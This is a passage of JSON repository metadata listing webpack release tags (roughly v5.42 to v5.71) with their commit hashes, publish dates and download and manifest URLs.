bpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641c